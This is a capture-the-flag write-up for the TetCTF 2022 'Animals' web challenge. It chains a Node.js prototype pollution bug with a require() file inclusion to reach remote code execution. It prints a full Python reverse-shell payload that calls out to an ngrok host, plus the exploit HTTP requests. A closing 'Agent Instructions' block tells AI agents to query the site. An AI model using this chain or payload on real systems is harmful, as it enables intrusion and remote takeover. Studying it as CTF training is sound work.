# Animals {% file src="/files/H4fXFVRICqgDs7vtzwIF" %} There is a prototype pollution vulnerability in `/api/tet/list` when merging the request data: ```javascript app.post('/api/tet/list', function (req, res, next) { try { const getList1 = require("./static/list-2010-2016.js") const getList2 = require("./static/list-2017-2022.js") let newList = merge(getList1.all(), getList2.all()) let data = req.body.data || ""; newList = merge(newList, data); res.json(newList) } catch (error) { res.send(error) } }) ``` Furthermore, user input being passed to `require()` leads to a LFI vulnerability. ```javascript app.post('/api/tet/years', function (req, res, next) { try { const list = req.body.list.toString(); const getList = require("./static/" + list) res.json(getList.all()) } catch (error) { console.log(error); res.send(error) } }) ``` If we could find a *valid `.js` file* that *uses an attribute that we are able to pollute* to spawn a new process or execute a command, then we could escalate this to an RCE. In the Docker container, the most likely place where we could find a suitable candidate would be in the `node_modules` folder, containing the source code of the installed modules. Doing a simple search for the `child_process` string, we could find some interesting scripts: ``` $ cd /usr/local/lib/node_modules $ grep -r "child_process" . ... ./npm/scripts/changelog.js:const execSync = require('child_process').execSync ./npm/scripts/update-dist-tags.js:const { execSync } = require('child_process') ``` The `changelog.js` script indeed has an `execSync` call with a possible command injection. ```javascript 'use strict' /* Usage: node scripts/changelog.js [comittish] Generates changelog entries in our format as best as its able based on commits starting at comittish, or if that's not passed, latest. Ordinarily this is run via the gen-changelog shell script, which appends the result to the changelog. */ const execSync = require('child_process').execSync const branch = process.argv[2] || 'origin/latest' const log = execSync(`git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...`).toString().split(/\n/) ``` Since the `require()` call would not pass in any arguments, `process.argv[2]` is undefined. Therefore, we can pollute `process.argv[2]` with a command injection payload before importing the `changelog.js` file. Testing this locally: ```javascript let a = {} const isObject = obj => obj && obj.constructor && obj.constructor === Object; const merge = (dest, src) => { for (var attr in src) { console.log(attr); if (isObject(dest[attr]) && isObject(src[attr])) { merge(dest[attr], src[attr]); } else { dest[attr] = src[attr]; } } return dest }; b = { ['__proto__']: { '2': "; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';" } } merge(a, b); require('./changelog.js'); ``` To perform this exploit chain on web server, we first perform the prototype pollution: ```http POST /api/tet/list HTTP/1.1 ... Content-Type: application/json { "data": { "__proto__": { "2":"; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';" } } } ``` Then, we exploit the LFI vulnerability to execute the `changelog.js` script. ```http POST /api/tet/years HTTP/1.1 ... Content-Type: application/json Content-Length: 81 {"list":"../../../../../usr/local/lib/node_modules/npm/scripts/changelog.js"} ``` This should grant us our reverse shell. ``` $ cd / $ ./readflag TetCTF{c0mbine_p0lLut3_lFiii_withN0d3<3} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ctf.zeyu2001.com/2022/tetctf-2022/animals.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.